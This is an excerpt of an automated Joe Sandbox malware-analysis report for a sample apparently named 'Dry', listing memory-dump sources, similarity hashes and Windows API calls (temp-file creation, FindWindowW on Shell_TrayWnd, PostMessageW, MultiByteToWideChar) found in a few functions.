                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7d669fcecc3e254ffd409552f9ce9eb997e6d6c13a6485da810396a33ac8ec0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCE039706003518BD364AF68E905602BAE4EF04381F008D9CE886D36A1EBB4D488CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B539F0
                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B53A05
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: 5d1c8426f30c177e1b0a2337e68a1a6a61d7d32b362e0899e7a9b60a2e611023
• Instruction ID: 7502e792131579eda376d553e983e15baaa23b3856f55fbc0c80f8cb0d7f4ae0
• Opcode Fuzzy Hash: 5d1c8426f30c177e1b0a2337e68a1a6a61d7d32b362e0899e7a9b60a2e611023
• Instruction Fuzzy Hash: AAD05E7254432877DA20A764DC0EFCB7A7CDF45750F0002A1BA59920A2DEB0DA86CB90
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B72DC8
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B72DDB
  • Part of subcall function 00B4F292: Sleep.KERNEL32 ref: 00B4F30A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: bcfb86273fbffcb12f43edd83e17505abadfaf8bda77b2d70f947a6d37abe8d1
• Instruction ID: dee90ba449777fb17045b1ea5f06dcb953915b2788a0c97ba71322c228572f6a
• Opcode Fuzzy Hash: bcfb86273fbffcb12f43edd83e17505abadfaf8bda77b2d70f947a6d37abe8d1
• Instruction Fuzzy Hash: 9AD0C935399315ABE664A770AC0BFE66AA4AF50B50F104869B249AB1D0CDE0A8408654
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B72E08
• PostMessageW.USER32(00000000), ref: 00B72E0F
  • Part of subcall function 00B4F292: Sleep.KERNEL32 ref: 00B4F30A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: da1761c51736065ef284f0f77315ee91cfbd13ce598f12d673dc97383aa1dcd6
• Instruction ID: b711c9188a2a6272f1315180d1b1a14509ce033e7b4d94dca55c331e4cdc4156
• Opcode Fuzzy Hash: da1761c51736065ef284f0f77315ee91cfbd13ce598f12d673dc97383aa1dcd6
• Instruction Fuzzy Hash: A3D0C9353C93156BE664A770AC0BFD66AA4AF55B50F504869B249AB1D0CDE0A8408654
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00B1C213
• GetLastError.KERNEL32 ref: 00B1C221
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B1C27C
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: bdd818f3589c54d365ce33112e11e594daa7d868667a8a67391b049d6daee054
• Instruction ID: b03e9a2323dcf4f0880de334439f48ac12ba55c2482704aa4bfcfcfe122537c5
• Opcode Fuzzy Hash: bdd818f3589c54d365ce33112e11e594daa7d868667a8a67391b049d6daee054
• Instruction Fuzzy Hash: 2D41D530680216AFDB218FE5C844AFA7FE5EF11720F6441E9E859AB1A1DB309D81C7A1